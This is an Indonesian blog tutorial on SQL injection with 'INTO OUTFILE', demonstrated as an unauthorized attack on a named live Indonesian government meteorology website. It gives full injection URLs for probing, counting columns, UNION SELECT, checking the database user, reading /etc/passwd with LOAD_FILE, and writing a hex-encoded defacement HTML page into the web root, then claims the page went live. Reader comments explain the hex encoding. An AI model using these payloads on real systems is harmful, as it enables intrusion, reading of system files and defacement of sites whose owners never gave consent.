SQL Into Outfile

 Tutorial SQL Into Outfile


Perhatian : Ini hanya sekedar sharing ilmu ( Konten Sensitif 18+ )





Oke,assalamualaikum Wr.Wb
Saya disini akan memberikan tutorial sederhana bagaimana caranya SQL Into Outfile.

Sambil saya memberikan tutorial alangkah lebih baik nya saya mengsimulasikan ini dengan live target: cews.bmkg.go.id

Langsung kita gass menggunakan Apk Anon Hackbar aja ya biar enak hehe:V

#Cari celah

Cari celah website vulnerability terhadap sql injection donk pastinya dengan menambahkan single quote 1 ( ') dibelakang parameter

https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'


Error menandakan vuln 



#Cari jumlah kolom

https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'order+by+8--+-


Jadi diketahui jumlah kolom nya ada 8


#Cari angka ajaib


https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'AND+0+UNION+SELECT+1,2,3,4,5,6,7,8--+-

Nah angka ajaib nya 5


#Cek user

Masukan user() pada angka ajaib

https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'AND+0+UNION+SELECT+1,2,3,4,user(),6,7,8--+-


Nah jika user nya root maka tandanya vuln into outfile

#Cari path upload

Masukan LOAD_FILE('/etc/passwd') pada angka ajaib

https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'AND+0+UNION+SELECT+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8--+-

Nah path nya E:\WWW\DISEMINASI_TERKINI\

Note: pada path ubah dari miring kiri ke miring kanan,contoh:

E:/WWW/DISEMINASI_TERKINI/

#Eksekusi

User nya root,path nya udah dapet,ya tinggal eksekusi mwehehe

https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'AND+0+UNION+SELECT+1,2,3,4,0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e6962622e636f2f5932544e3254502f32303230303432332d3230353733342e6a7067273e2c3c62723e2c3c68313e416b626172204665617420416e696e64613c2f68313e2c3c62723e2c3c68323e5765204c6f766520496e6a656374696f6e7320546f204578706c6f69743c2f68323e2c3c62723e2c3c617564696f206175746f706c61793d226175746f706c61792220636f6e74726f6c733d22636f6e74726f6c73227372633d2268747470733a2f2f632e746f7034746f702e696f2f6d5f3135333367377a3230302e6d70332220747970653d22617564696f2f6d706567223e3c2f617564696f3e2c3c68353e20436f707972696768742041574e2047616e73203c2f68353e3c2f63656e7465723e,6,7,8+INTO+OUTFILE'E:/WWW/sundaxploit01.html'--+-

Nah jika seperti ini kalo error jangan sedih itu work kok,kita tinggal cek aja,udah ke upload belum

Mari kita cek web nya:
https://cews.bmkg.go.id/sundaxploit01.html

Dan boom berhasil menn
Sekian dari saya,mohon maaf bila ada kesalahan,terimakasih telah berkunjung:)

2 komentar untuk "SQL Into Outfile"

  1. Mas itu masukin script nya gmana biar kaya gitu pake nomer?

    BalasHapus
    Balasan
    1. Code html nya di encode ke hex mas,sama seperti cara membuat dios sql-i

      Hapus

Posting Komentar

Berlangganan via Email